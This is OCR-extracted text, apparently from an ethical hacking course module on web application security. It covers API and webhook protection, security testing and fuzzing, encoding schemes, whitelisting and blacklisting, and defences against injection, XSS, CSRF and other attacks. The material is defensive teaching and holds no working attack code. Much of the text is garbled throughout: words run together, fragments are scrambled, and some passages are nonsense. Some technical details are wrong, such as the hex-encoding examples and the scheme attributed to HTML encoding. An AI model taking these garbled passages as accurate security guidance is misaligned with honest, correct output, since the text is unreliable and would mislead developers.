responseinto several
fragments
so that the payloadsare not oversized
Use parameterized statements i n SQL
queriesto prevent that includeentire SQL
inputs
statements
ical andCountermensores
Mackin ©by E-Comel
Copyright
Performinputvalidation on the server side insteadof the client side to prevent
bypassingattacks
Conductregular
security
assessmentsto secure all the API endpoints
usingautomated
tools
Regularly
monitor and perform
continuous auditing
of the API and analyze
the
workflows anyattacks
to prevent
toestablish
Usetokens trustedidentitiesandto controlaccessto servicesandresources
Use ensure
that
signatures
Employ
packet
to onlyauthorized
or
userscan decrypt modify the data
sniffersto track events relatedto informationdisclosureand to detect
insecure APIcalls
Usetechniques
suchas quotasand throttling
to controlandtrackthe API usageand to
set theAPI requestlimit
Implement to authenticatethetrafficandcontrolandanalyze
APIgateways theusageof
APIs
Implement
advancedtechniques
to preventsophisticated
human-likebots from
accessing
Implement
the
APIs.
multifactor authenticationand use authenticationprotocols such as
AppToken,
OAuth2,and OpeniDConnect to authenticatethe users and applications
in
theAPI
Documentaudit logsbeforeandafter every security
event,and makesure to sanitize
thelogdatato preventloginjection
attacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
BestPracticesfor Securing
Webhooks
receipt
repicatan
.
againsevent
Tackevent io 0 double
pocesing
ansoutgng
te
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Application
‘Web Concepts
——_——_=S=—
Woo Applicaton
Web
Application API,
Threats andWebhooks,
Web
Web
Shell
———_=[[_
»—_—
WebApplication
Security
|
— 7
Web Application
Security
After learning
the hacking methodologies adopted byattackersof web applicationsand the
toolstheyuse, it is importantto learnhowto secure theseapplications fromsuchattacks.A
carefulanalysisof security will help
you, as an ethicalhacker,
to secure your applications.
Todo
design,
s0, one should develop, andconfigure webapplications usingthe countermeasuresand
techniquesdiscussed in thissection.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
Security
Testing
1
|*
notes tating
tena
wing
mast
at,
pletion
woteccctrtneunates catomaed
he cede
entnenes
esened
cea opens
aso rae een
Dynamic
Application
@asn)
Web Application
Security
Testing
Web application a processof conducting
securitytesting is securityassessment and
performance
analysis
of an application timelyreportso n its security
andgenerating levelsand
threatexposures.
It is oftenconducted bysecurityprofessionals
andprogrammers
to test and
strengthen
the security of an application
usingthe following
techniques:
‘=
ManualWebApplication
Security
Testing
Manualsecuritytesting involvestesting usingmanually
a web application designed data,
customizedcode,and some browserextension tools such as SecApps to detect
vulnerabilitiesandweaknesses associated It mainly
with the applications. focuseson
logic
business e rrors andthreat analysis.
Securityprofessionals
alsouse othertoolssuch
as Selenium, JMeter,Loadrunner, QTP,Bugzilla, and Test Link to perform manual
testing.
WebApplication
‘Automated Security
Testing
It is a technique
employed
for automating
the testingprocess.Automatedtestingtools
can beused
forthe rapid
discovery
ofvulnerabilities manner so thatthey
in a systematic
can be patchedeasily.
Thesetestingmethodsand procedures are incorporated into
eachdevelopment stageto reportfeedback constantly. Changesi n everypieceofcode
can be analyzed
anddevelopers are instantly
notifiedif anyvulnerabilitiesa re detected
Securityprofessionals
use tools suchas Ranorexstudio, TestComplete, LAPWORK,
KatalonStudio,
andTestsigma to carryout automatedtesting,
StaticApplication
SecurityTesting(SAST)
Static application i n whichthe complete
is alsoreferredto as a whiteboxtesting,
testing
systemarchitecture(includingits source code)or application/softwareto be testedis
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
FuzzTesting
ett
eoaing
error
and
(©webaptcaton zt stg rags ack boxesting
nwa apes
seeurtyoopales
ethos. Ra
quay
checking
anderen ecg ee 0
Fuzz TestingScenario
2 Fur
Program joo->)HTTP
Cent
Web Application
Fuzz Testing
‘Web fuzztesting(fuzzing)
application is a blackbox testingmethod.It is a quality checking
and
assurancetechniqueusedto identify
coding loopholes
errors andsecurity i n web applications.
Massiveamountsof random are generated
datacalled“fuzz― byfuzztesting tools(fuzzers)
and
Usedagainstthe targetweb application to discovervulnerabilitiesthat can be exploitedby
Attackersemploy
various attacks. various attack techniques to crashthe victim'sweb
employ
application
and
applicationscause havocin the leastpossible
thisfuzztesting
against
technique
time. Security
to test the robustness
attackssuchas bufferoverflow, DOS,XSS,
personnel
andSQL
andweb developers
and immunityof the developed
injection,
web
Steps
of FuzzTesting
Webapplicationfuzztestinginvolvesthe following steps:
=
Identify targetsystem
the
=
*
Identify
Generate
inputs
fuzzeddata
Execute the test using fuzzdata
=
Monitor behavior
system
Log
FuzzTesting
defects
Strategies
‘=
Mutation-Based:In this typeof testing,the current datasamples create new test data,
andthe new test datawill againmutate to generate furtherrandomdata.Thistypeof
a sample
testingstarts with valid
mutating
until
andkeeps
ical
the targeti s reached,
andCountermensores ©
Mackin by E-Comel
Copyright
Generation-Based:In thistypeof testing,the new datawill be generated fromscratch,
andthe amount of datato be generated is predefined
basedon the testingmodel
Protocol-Based:
In this typeof testing,the protocolfuzzersendsforged packets
to the
targetapplication
that is to be tested.Thistypeof testingrequiresdetailedknowledge
of the protocolformat beingtested. It involves writinga list of specificationsinto the
fuzzertool and then performing the model-based test generation technique to go
through all the listed specifications
and add the irregularities i n the data contents,
sequence,etc
FuzzTesting
Scenario
Thediagram
httprequests
of
belowshowsan overview of the main componentsthe fuzzer.Anattackerscript
is fed to the fuzzer,whichin turn translatesthe attacksto the targeta s httprequests.
will get responsesfromthe targetandall the requests
These
andtheir responsesare
thenlogged
formanualinspection,
logs
Figure fuzztesting
14.99:Web application scenario
Tools:
FuzzTesting
=
(https://www.owasp.ora)
WsFuzzer
=
(https://www.owasp.org)
WebScarab
+
BurpSuite(https://portswigger-net)
HCLAppScan®
Standard(hetps://www.heltech.com)
(https’//www.peach.tech)
PeachFuzzer
ical andCountermensores
Mackin ©by E-Comel
Copyright
SourceCodeReview
1GSourcecodereviews
ae usedto detec hugs
andregularities webappleations
i n developed
|@ keane
performed
oF manualybyautomated
autheestion,
regarding
tol to ent specie
seston management,ad dt validation
area inthe aplationcade thathanlefuneions
©Irean
identity
vulnerabilities
nonadated
wel
poor
codingthat
alow
to dat s as developers
techniques attaches
to
Fodbac Of rae oy
SourceCode Review
Sourcecode reviews are usedto detectbugs
and irregularities
i n the developed
web
applications.
Theycan be performed manually or using automatedtools to identify specific
areas i n the applicationcode to handle functionsregarding authentication, session
management, anddatavalidation.They
c an identify
un-validateddatavulnerabilitiesand poor
coding
techniques
ofdevelopers
that allowattackers
Manual CodeReview
to
exploit
applications.
theweb
AutomatedCodeReview
mee
Nosy
Mosty
ical andCountermensores
Mackin ©by E-Comel
Copyright
Schemes
Encoding 43H
|G Web applicationsemploy
diferentencoding fortheirdatat o safely
schemes handle
unusual and
characters
binary
data
way in the you intend
of Encoding
‘Types Schemes
Encoding
Schemes(Cont'd)
UnicodeEncoding Base64Encoding
stucmenfo example
eeeetekense
Sitone @
Encoding
Schemes
Encodingis the processof converting
source information into its equivalent
symbolicform,
which helps i n hiding
the meaningof the data. At the receivingend,the encodeddata is
decoded into the plaintextformat.Decoding is the reverse processof encoding. Web
applicationsemploydifferent encoding schemesfor their data to safely handle unusual
anddata
characters binary i n the intendedmanner.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Encoding
Types Schemes
=
URLEncoding
Webbrowsers/web servers permitURLsto contain onlyprintable characters of ASCII
code that can be understood bythemfor addressing.
URLencoding is the processof
converting a URLinto a validASCIIformat so that data can be safely transported over
HTTP.Several characters i n thisrangehavespecialmeaningswhenthey a re mentioned
i n the URLscheme
replaces unusual
codeexpressed
or HTTP protocol.
ASCIIcharacters
i n thehexadecimal
Thus,
with "%6"
format,suchas:
are
thesecharacters restricted.URLencoding
followedbythecharacter'stwo-digitASCII
HTMLencoding
‘An schemeis usedto represent
unusual so that they
characters c an be
safely andocument.
combined
encoding
within HTML
withstringsthat can be recognized
HTML replaces
whilethevarious characters
unusualcharacters
definethestructure of
the document.If you want to use the same charactersas thosecontainedi n the
document, you might encounter problems.Theseproblems can be overcome using
HTML encoding. It defines severalHTML entities to representparticularlyusual
characters
suchas:
>
kamp; &
0 alt; <
© sgt; >
UnicodeEncoding
Unicodeencoding 16-bitUnicodeencoding
is of two types: andUTF-8.
© 16-bitUnicodeEncoding
Itreplaces
unusualUnicode characters with "su" followedby the character's
Unicodecodepoint
expressedin thehexadecimal format.
© su22is /
uTr-8
It is a variable-length
encoding
standardthat expresses
eachbytei n the hexadecimal
formatandprefixes
it with %,
+ ac2%a9 ow
© 32889880
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Base64Encoding
The Base64encoding schemerepresents any binarydata usingonlyprintable ASCII
In general,
characters. it is usedfor encoding
emailattachmentsfor safetransmission
‘over
SMTP
For also user
and
example:
for encodingcredentials,
cake 01100011011000010110101101100101
=
Base64Encoding:
011000 110110 000101 101011 011001 010000 000000
000000
Hex Encoding
The HTMLencoding schemeuses the hex value of every characterto represent
a
collectionofcharacters binary
fortransmitting data.
For,example:
Hello a125caseps
Jason 1238684aD9
ical andCountermensores
Mackin ©by E-Comel
Copyright
Whitelisting
vs. Blacklisting
Applications
the unauthoried
ithelp i n preventing
andspreading
‘execution ofmalicious
programs
uel
thatcan in
blocking
caus
applications
malicious
potential
damage
or tack
that and
Daclitings method
a theeat-centee ast
iitelsting avoidsthe instalation
of threat
Cannotdetectmodeen results
or vulnrableaplication’
‘unapproved stacks lendtodts oe
iitelsing
provides
arate
rowing protection
malware
attacks
Honbilty
against
ransomunar
by
ot
e
forprotection
regularly
Ieisimpoctantte updatet hebacks
atestm alware
agains attacks
Whitelisting
vs. Blacklisting
Applications
Webapplicationshave played
an importantrole i n the adoption
of digital
transformation
‘globally.
Suchrapid
development
hasmotivatedattackersto compromise
system
security
using
techniques
different
theseattacks,
strategies.
that
exploit
theflawsand breaches
professionals
security need to implement
present i n the applications.
various security policies
To thwart
and testing
Whitelisting
andblacklistingis one suchsecurity strategythat can retain the applications,
networks, securely.
andinfrastructures Usingthis strategy,
shouldbe allowedand thosethat shouldbe blocked.
effectively
blockedbeforeit enters the organizational
one can create listof entities that
Thus,any malicioussoftwarecan be
network.
a
ApplicationWhitelisting
Applicationwhitelistingspecifiesa list of applicationscomponentssuchas software
libraries,
plugins,
extensions, and configuration
files,or legitimate
softwarethat can be
permitted
to execute i n the system.It helps unauthorizedexecution
i n preventing and
spreadingof maliciousprograms.It can also preventthe installationof unapproved or
Whitelisting
vulnerableapplications. provides byproviding
greaterflexibility protection
againstransomware andothertypesof malwareattackson web applications.
Application Blacklisting.
Application blacklisting
specifiesmaliciousapplications or softwarethat are not
permitted to beexecutedin the system or the network.Blacklisting can be performed
byblocking maliciousapplications
that can cause potential damage or lead to attacks.
Blacklisting
is a threat-centricmethod; i t cannot detectmodernthreatsand resultsi n
attacksleading to data loss.Hence,
it is important to update
the backlistregularly
to
ical andCountermensores
Mackin ©by E-Comel
Copyright
defendagainst
adding
the latestmalware
the names of applications attacks.
Application
to
blacklisting
can be performed
be blockedat the firewalllevelor installing
to blocktheapplications
software
by
specific
Blacklisting
and whitelisting
for basicURLmanagement
URLblacklisting
preventsthe user from loading
web pages from the blacklistedURLs.
URLwhitelisting
Theuser can accessall URLsexceptthosei n theblacklist. permitsthe
users to access onlyspecific
URLsas exclusionsto thosethat are addedto the URL
blacklist.
URLwhitelisting
is performed
usingthefollowing
methods:
Allow accessto all URLsexceptthe blockedones: Whitelisting
can allowthe users
of
to access the rest the networkapplications
Blockaccessto all URLsexceptpermitted
ones: Whitelisting
can permita ccessto a
limitedlistof URLs
Define exceptions
to very restrictiveblacklists:Whitelisting
lets users access
schemes, ofotherdomains,
subdomains specific
paths,or ports
Allow the browserto open applications:
Whitelisting
is performed
onlyfor specific
external protocol handlers so that the browser can automatically
execute
applications
URLblacklistingis performedusingthe following
methods:
© Allow access to all URLsexcept the blockedones: Blacklisting
preventsusers from
blockedwebsites
accessing
Blockaccess to all URLsexceptpermitted
ones: Blacklisting
blocksaccess to all
malicious
URLs
Defineexceptions Blacklisting
to very restrictive blacklists: restricts accessto all
URLs toattacks
that are vulnerable
Blacklisting
Allow the browser to open apps: preventsthe browserfrom
automatically
applications executing
ical andCountermensores
Mackin ©by E-Comel
Copyright
Application
Whitelisting
Blacklisting and Tools
CEH
Minimal
andSimple
Threat
Intelligence
AntiAbuse
APIs
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
16.102:
Screenshot
of Apt 0
Someadditionalapplication
whitelisting
and blacklisting
toolsare as follows:
+
AutoShun(https://www.autoshun.org)
=
(https://umbrella.cisco.com)
CiscoUmbrella
Alexa TopSites(https://aws.omazon.com)
APTGroups (https://docs.google.com)
andOperations
NordVPN(https://nordvpn.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst Attacks
Injection
SQL
Injection Attacks InjectionF laws
Command
File InjectionAttacks
LDAPS
(LDAP over st to secre communion he
sd
the wo
sng
the
use
val fanetionprs inpat
Server
SideInjection
Template hogInjection
‘aye
pss
namic atte
ical andCountermensores
Mackin ©by E-Comel
Copyright
Disable suchas xp_cmdshell
commands
Isolatethe databaseserver andwebserver
Always andlow-privileged
use a methodattributeset for POST account for D8
connection
Runa databaseservice account with minimalrights
Moveextendedstoredprocedures
to an isolatedserver
Usetypesafe
variablesor functionssuchas to ensure typesafety
isNumeric()
Validate
andsanitizeuser inputs
passedto thedatabase
Avoidusingdynamic SQLanddo not construct querieswith theuser input
Useprepared parameterized
statements, queries,or storedprocedures
to access
the database
Display
lessinformationandusethe "RemoteOnly" modeto display
customErrors
verboseerror messageson the localmachine
andcharacterfiltering
Performproper escaping to avoidspecial characters,
string
andsymbols quotes(')
suchas single
Always
set thewhitelistlogically
insteadof the blacklistto avoidbadcode
UseObjectRelationalMapping
(ORM) frameworks to makethe conversion of SQL
resultsetsinto codeobjects
more consistent
Injection
‘Command Flaws
Thesimplest way to defendagainst commandinjection flawsis to avoidthemwherever
possible. Somelanguage-specific librariesperform identicalfunctionsfor manyshell
‘commandsandsome system calls.Theselibrariesdo not contain the operating system
shellinterpreter andhenceignoremaximum shellcommandproblems. For thosecalls
that must still be used,suchas callsto backenddatabases, one must carefully validate
the data to ensure that it does not contain maliciouscontent. One can also arrange
ina executable
various requests pattern,
datainsteadof
potentially
whichensuresthat all the givenparameters
content.
are treatedas
ical andCountermensores
Mackin ©by E-Comel
Copyright
be able to misuse administrative rights.
The use of Java sandboxi n the J26€
environment stopsthe execution of system
commands. Externalcommands are usedto
ccheckthe user information
whenhe/she provides
it, Createa mechanismfor handling
all possible
errors, timeouts,or blockages
during the calls.Checkall the output,return,
anderror codesfromthe callto ensure that it performs as expected, Doings o allows
users to determinewhether something hasgone wrong. Otherwise, an attack might
occur andnever bedetected.
‘Some command
countermeasuresagainst flawsare as follows:
injection
©.
2
Performinput
Escape
dangerous
validation
characters
>
Use language-specific
librariesthat avoidproblems
dueto shellcommands
Performinputandoutputencoding
Usea safeAPIthatavoidsuse ofthe interpreter
entirely
so thatall supplied
Structurerequests are treatedas dataratherthan
parameters
potentially
executablecontent
Useparameterized SALqueries
Usemodularshelldisassociation
fromthekernel
Usebuilt-inlibrary
functionsandavoidcalling directly
OScommands
‘commandsthe
Implementleastprivileges
to restrict the permissionsto execute the OS
Avoid executing
commands
suchas exec or without proper validationand
system
sanitization
usingpent|_fork
Preventthe shellinterpreter andpentl_exec
withinthe PHP
Implement
Python insteadof PHPfor application
asa webframework development
LDAP
Injection
LDAPinjection
‘An
Attacks
attackson web applications
attackis similarto an SQLinjection: co
the user inputto create LDAPqueries.Executionof maliciousLDAPqueriesin the
‘opt
applications
creates arbitrary
queriesthat discloseinformationsuchas username and
password,
thusgranting a ccessandadmin
attackersunauthorized privileges.
Somecountermeasuresagainst
LDAPinjection
attacksare as follows
© Performtype,pattern, anddomainvaluevalidationon all inputdata
©.
©.
Make
LDAPspecific
the
Validate
filter as as possible
©
Strongly user
validatethe
implementing jail
Consider a
input
chroot
© allow_url_fopen
PHP:Disable allow_url_include
php.ini
and in
©
©
PHP:Disable
and to find
register_globalsE_STRICT use
PHP:Ensurethat ll fle andstream functions(stream_*)
are carefully
uninitialized
vetted
variables
JSInjection
Server-Side
inputsare strictly
Ensurethat user validatedo n the server sidebeforeprocessing
using
‘Avoid theeval()
Neveruse commands
function
having
to parsetheuser input
identicaleffects,suchas setTimeOut(), setintervall),
andFunction()
UseJSON.parse()
insteadof eval()
to parsethe JSONinput
Avoid
using
with
file
pages
preventattacks
nameextensions
such
.shtm,
as
to
.stm, and .shtml
Template
Server-Side Injection
© Donot create templates
fromuser inputsor passuser inputsas parameters
into the
templates
ical andCountermensores
Mackin ©by E-Comel
Copyright
© Useasimple
template or Python's
enginesuchas Mustache template
if thebusiness
templates
supportuser-submitted
requirements
Reviewthe template for hardening
documentation
engine’s tips
Executethe template
insidea sandboxed
environment
©
©.
Consider
template
Always
possible
loading
static
makesure to passdynamic
files wherever
datato a template
using the template
engine's,
built-infunctionality
Loginjection
o
©
Passlogcodesinstead
andeasily
Usecorrect error codes
through
of messages parameters
recognizable
error messages
© AvoidusingAPIcalsto ogactionsdueto theirvisibility
i n browsernetwork
cals,
Makesure to passuser IDsor publicly
non-identifiable as the parameters
inputs at
logging
endpoints
Validateinputsat boththe server sideandtheclientsideandsanitizeandreplace
themalicious
characters
Injectionfor that
© carefullyany vulnerabilities
Examinethe application are usedto renderlogs
HTML
to
Validateallthe user inputs
supplied
text
remove substrings
the HTML-syntax fromuser-
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
AttackCountermeasures
BrokenAuthenticationand SensitiveData Exposure
Donat cant or ue
weakeryptopr gets
se
hated
oredina orm
true aa sored on aki a ey
‘XML
External Entity
WebApplication
AttackCountermeasures(Cont'd)
Security
Misconfiguration XSSAttacks
ae et Gea
os
Coan
3
analpanuac
sai
eSSL Peete on SHOESKORNOY
gab
Coan
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
AttackCountermeasures(Cont'd)
Inrecure ingComponents
with
7
WebApplication
AttackCountermeasures(Cont'd) EH
protected
aresbtn access rights
othe ofthewebsite
| 9
‘Traversal
iactory Aeshna
toate thedetory tera
nett cha Ucd
ld usingrere nd forwards
Watering patches
remave
any
eeuay aly oftware to wneabtes
secure
to the
ste
. nt
|
aitatering
the ONSsere peor
Analytesar behavior
atc om edeeting
Module4 1972
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
WebApplication
AttackCountermeasures(Cont'd)
©HTTP
wu
Forgerybromer
and
webstes
Tequest |
to
soveloh
FST,
Donotalow
URL
‘chekthe tere ander ad when posting
deta
ore parameters
|
Polsening be ® Theuthensaton
cede an cook shoud asocte
wen
cen ee docaent uthntcton cede tat we AN
WebApplication
AttackCountermeasures(Cont'd)
(Clickjacking
Attack JavaScript
Hijacking
Usethe
content
ser gale[CSPHTTPheader est
Username
Enumeration ‘Attack
on Password
R esetM echanism
rrr
WebApplication Attack Countermeasures
Broken Authentication andSession Management
Flaws authenticationand
i n session application
management functionsallowattackers
to gain passwords,keys,and session tokensor exploitother implementation
vulnerabilitiesto gainotherusers’
credentials.
9
Use
SSL
for parts
Verify
of
the
application
al authenticated
whetheral the users’
identitiesandcredentialsa re storedi n a hashedform
> Neversubmitsession dataas partof a GET,POST
‘Apply
passphrasing withatleast
f ive randomwords
attemptsandlockthe account for a specific
Limitthe login period
after a certain
of
number failed attempts
Usea secure platform
to longrandomsessionidentifiers
sessionmanager generate
for secure session development
Implement
multi-factarauthenticationmechanisms
to prevent credential
guessing,
stuffing,
andbrute-forcing
Makesure to secure passwords
with a cryptographic
password
hashalgorithm
or
toolssuchas berypt,
scrypt,
or Argon2
©
©
Make
sure passwords
against
listprobable
to check
Logauthentication
weak a of the topbadpasswords
failuresandsendalertswhenever attacksare detected
SensitiveDataExposure
Manyweb applications do not properlyprotectsensitive data suchas credit card
numbers, SSNs, andauthenticationcredentialswith appropriateencryption or hashing.
may stealor modify
‘Attackers suchweakly protected data to conductidentity theft,
creditcardfraud,or othercrimes.
Somecountermeasuresagainst
sensitive dataexposureattacksare as follows:
© Donot create or use weakcryptographic
algorithms
© Generate keys
encryption offlineandstore themsecurely
© Ensurethat encrypted
datastoredon thediskis not easyto decrypt
UseAESencryption (HTTP
forstoreddataanduse TLSwith HSTS StrictTransport
Security)
for incoming traffic
Classify
the dataprocessed,
stored, or transmitted bya n application
andapply
controls
accordingly
UsePCIDSScompliant
tokenizationor truncation to remove the datasoon after its
requirement
ical andCountermensores
Mackin ©by E-Comel
Copyright
Useproperkey management a re in place
andensure thatall the keys
Encrypt
all the datain transit usingTLSwith PerfectForwardSecrecy (PFS)
ciphers
Disablecaching
techniques
for requests
that contain sensitive information
XML ExternalEntity
Avoidprocessing references
XMLinputcontaining entities bya weakly
to external
configured
XMLparser
XML
unmarshaller
should
configured
securely
securely
be
configured
Parsethedocumentwith a parser,
Configure
theXMLprocessor
to use locals tatic DTDanddisable
anydeclared
DTD
includedin an XMLdocument
Implement
whitelisting,
input
validation, andfiltering
sanitation,
preventhostiledatawithintheXMLdocuments
techniques
to
caching
Avoid client-side mechanisms
s essiontokenson the server sideon user logout
Remove
Ensurethat minimum privileges
are assigned
to usersto perform
onlyessential
actions
Enforce once andre-use themthroughout
accesscontrolmechanisms the
application
Misconfiguration
Security
Securitymisconfiguration potentially
makesweb applications vulnerableand may
provide
attackerswith access to them as well as to files and other application-
controlling layerprotection
functions.Insufficienttransport allowsattackers to obtain
unauthorized a s well as to perform
access to sensitive information attackssuchas
account theft,phishing,
andcompromising adminaccounts.Encrypt all communications
betweenthe websiteand client to preventattacksdue to insufficient
transportlayer
protection.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Some
countermeasuresagainst misconfiguration
security attacksare as follows:
Configure
all security
mechanisms anddisableall unusedservices
Setup
roles,
permissions,andaccountsanddisableall defaultaccountsor change
their defaultpasswords
vulnerabilitiesandapply
Scanfor the latestsecurity patches
thelatestsecurity
Non-SSL to web pagesshouldberedirectedto theSSLpage
requests
flagon all sensitive cookies
Set the ‘secure’
Configure
the SStprovider to supportonlystrongalgorithms
is validandnot expired,
Ensurethatthe certificate andthat it matches
alldomains
usedbythe site
0 Backend technologies
andotherconnectionsshouldalsouse SSLor otherencryption
XSSAttacks
XSSis anothertypeof inputvalidation attacksthat targetthe flawedinputvalidation
mechanism of web applications
for the purpose of maliciousactivities. Attackersembed
maliciousscriptinto web application
‘a inputgates,whichallowsthem to bypass the
measures imposed
security bythe applications.
‘Some XSSattacksare
countermeasuresagainst as follows:
©
all
Validate
headers,
parameters) cookies,
query
strings,
fields,
hidden
fields
(i..,
all
a rigorous specification
against
form and
Use
thetesting
toolsextensively
application
during
the design
beforeit goesinto use
phase
to eliminatesuchXSSholesi n
Usea webapplication
firewallto blockthe executionof a malicious
script
displaying HTML
character
Convertall non-alphanumeric characters
the user inputin search
into
enginesandforums
entities before
Encodeand
the inputandoutput filtermetacharacters
Nevertrust websitesthat use HTTPS
in the input
whenit comes to XSS
Filtering
the scriptoutputcan alsodefeatXSSvulnerabilitiesbypreventing
them
frombeingtransmittedto users
Deploypublic for authentication,
keyinfrastructure(PKI) whichchecksto ascertain
introducedis actually
that the script authenticated
Implement
a stringent policy
security
Webservers, application servers, andweb application environments are vulnerable
It is difficult to identify
to cross-site scripting. and remove XSSflawsfrom web
applications.Thebestwayto findflawsis to perform a securityreview of the code
ical andCountermensores
Mackin ©by E-Comel
Copyright
and searchin all the places
wherethe inputfroman HTTPrequestcomes as an
outputthrough HTML.
>
Attackeruses a varietyof HTML tagsto transmit a maliciousJavaScript. Nessus,
Nikto,andothertoolscan helpto some extent in scanningwebsitesfor theseflaws.
i n a website,it is highly
If the scanningdiscoversa vulnerability likelyto be
vulnerableto otherattacks.
Reviewthewebsitecodeto defendagainst XSSattacks.Checkthe robustness of the
codebyreviewingit and comparingit against exact specifications. Checkthe
following areas: headers,cookies,
querystringformfields, andhiddenfields.During
the validationprocess, there must be no attempt to recognize the active content,
either byremovingthefilter or bysanitizingit.
Thereare manyWaysto encodeknownfiltersfor active content. A “positive security
policy―
is highly recommended, whichspecifies whatis allowedandwhatmust be
removed.Negative or attacksignature-based policies
are difficult to maintain, as
theyare incomplete.
Inputfieldsshouldbe limited to a maximum size since most scriptattacksneed
severalcharacters
to initiate.
Implement Policy
Content Security (CSP) the browserfromexecuting
to prevent XSS
attacks
Escape
untrustedHTTPrequestdata built on the context i n the HTMLoutputto
resolveReflectedandStored XSSvulnerabilities
Employ whenaltering
context-sensitive encoding the browserdocumento n the
clientside,
whichactsagainst
the DOM-XSS
Insecure Deserialization
Validate
untrusted
inputthatis to beserializedto ensure that theserializeddata
contains only
trustedclasses
of
Deserializationtrusted datamust cross
Developers must re-architect
a
theirapplications
trust boundary
‘Avoid forsecurity-sensitive
serialization classes
Guardsensitive dataduring
deserialization
Filteruntrustedserialdata
Enforceduplicate
deserialization
security
manager
checks
during in a class serializationand
Understand
the security
permissionsgiven to serialization
anddeserialization
Implement checksor encryption
integrity objects
of the serialized data
to prevent
modification
or hostileobject
creation
ical andCountermensores
Mackin ©by E-Comel
Copyright
Isolatecodethat deserializes
so that it runs in very-low-privileged
environments
Logthedeserialization andfailuresso that the incomingtypeis not the
exceptions
the expected
same as type;otherwise,it throwsan exception
Using withKnownVulnerabilities
Components
Regularly
checkthe versions of bothclient-sideandserver-side and
components
their dependencies
Continuously Vulnerability
monitor sourcessuchas theNational (NVB)
Database for
vulnerabilitiesin your components
Apply patches
security regularly
©
components
Scanthe
Enforce
security
scanners
frequently
with
andbestpractices
policies
security forcomponent
use
Reviewall the dependencies
including
transitive dependencies
andensure that they
are
notvulnerable
regular
Maintaina ofthe versions ofbothclient-side
inventory andserver-side
components regularly
Makesure to obtaincomponentsfromofficialsources andacceptonlysigned
packages
Insufficient
Logging
and Monitoring
© Definethe scopeof assetscoveredi n logmonitoring
to includebusiness
critical
areas
a minimum baseline
Setup for logging andensure thatitis followedforall assets
Ensurethat logs
a re logged
with user context so that theyare traceablefor specific
Ensureall logins,
withthenecessary
access controlfailures,
input
and
user context to identify
validationfailurescan be logged
suspicious accounts
Makesure that high-value transactionsconsistof an audittrail with integrity
Traversal
Directory
of
controlsto preventtamperingthe databases suchas append-only databasetables
ical andCountermensores
Mackin ©by E-Comel
Copyright
must configure web applications fileanddirectory
andtheir servers with appropriate
permissionsto avoiddirectory
traversalvulnerabilities.
directory
Somecountermeasuresagainst traversalattacksare as follows:
© Definea ccessrights
to the protectedareas ofthe website
Somecountermeasures againstunvalidated
redirectsand forwardsattacksare as
follows
©. Avoid usingredirects
andforwards
© Ifthedestination
parameters ensure that the supplied
cannot beavoided, valueis
validandauthorizedfor the user
Avoid allowing
URLas a user inputfor thedestinationandvalidatetheURL
Sanitizethe inputbygenerating
a listof trustedURLsthat includes
a listof hostsor
regex
Implement
meta refreshi n the page, as it can use hardcodedHTMLto automatically
redirect
usersto another
page
Watering
HoleAttack
Applysoftwarepatches
regularly
to remove anyvulnerabilities
ical andCountermensores
Mackin ©by E-Comel
Copyright
Monitor
network traffic
attackersfromredirecting
Securethe DNSserver to prevent the site toa new
location
Analyze
user behavior
websites
Inspect
popular
Usebrowserplug-ins
that blockHTTPredirects
Disablesuch
as content
third-party advertising
services, whichtrackuser
Makesure to hideonlineactivitieswith a VPNandenable
thebrowser's
private
activities
browsing
feature
Makesure to run thewebbrowseri n a virtualenvironment to limit access to the
localsystem
Request
Cross-Site Forgery
Usinga CSRF attack,attackerslure a user'sbrowserinto sending a fake HTTP request,
including
the user sessioncookieandotherauthentication information, to a legitimate
(vulnerable)
‘Some
webapplication to perform
countermeasuresagainst
malicious
activities.
forgery
cross-siterequest attacksare as follows:
©.
©
Logoff
immediately
after usinga web
Donot allowyour browser
application
andwebsiteto save login
the
history
andclear
details.
@POST,
ChecktheHTTPReferrerheaderandwhenprocessing ignoreURL
parameters
Usereferer
flag
that
suchas HttpOnly
headers
headerusingjQuery
a n X-Requested-With
sends custom
Use
CSRFnonce
tokens
tokenssuchas
fieldto avoidillegal
access
that are submittedthrough
the
hidden form
Cookie/Session
Poisoning
use cookiesto maintain a session state. They
Browsers alsocontain sensitive,
session-
specific
data (e.g.,
user IDs,passwords, linksto shopping
account numbers, cart
contents,supplied private information, and session IDs).Attackers engage i n
poisoningbymodifying
cookie/session the data i n the cookie to gainescalated
access or
maliciously
affecta user session.Developersmust hencefollow secure coding practices
to secure web applications againstsuch poisoningattacks.They must use proper
session-token
generation mechanismsto issuerandomsessionIDs
Somecountermeasuresagainst cookie/session
poisoning attacksare as follows:
© Do not store plaintext
or weakly passwords
encrypted i n cookies
©
cookie
Implement timeout
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cookieauthenticationcredentials
shouldbe associated
with an IP address
Makelogout
functionsavailable
Validateallthe cookievaluesto ensure that theyare well-formedandcorrect
Usevirus and malwarescanning
softwareto protectthe browserfromany malicious
that hijack
scripts thecookies
Clearstoredcookiesfromthe browserregularly
Employ to change
cookierandomization the websiteor a service cookiewhenever
the user makesa request
Usea VPNthat adopts
high-grade andtrafficroutingto preventsession
encryption
sniffing
WebServiceAttack
Usemultiple layerprotectionand standardHTTPauthenticationtechniques to defend
web service attacks.Becausemost modelsincorporate
against business-to-business
it becomes
applications, easier to restrict accessto onlyvalid users.
‘Some
additionalcountermeasuresagainst webservice attacksare as follows:
©. Configure
WSDL
WSDL-basedAccess
Control
Permissions
grant
access
SOAPmessages
to or deny to any typeof
Usedocument-centric
authenticationcredentials
that use SAML
Usemultiple credentialssuchas X.509Cert,
security SAMLassertions,
andWS
Security
Deploy firewalls
web-service-capable thatcan performof SOAP-
andISAPI-level
filtering
Configure
firewalls/IDS for web service anomaly
systems andsignature
detection
Configure
firewalls/IDS to filterimproperSOAP
systems andXMLsyntax
Implement centralizedin-linerequests
andresponse schema validation
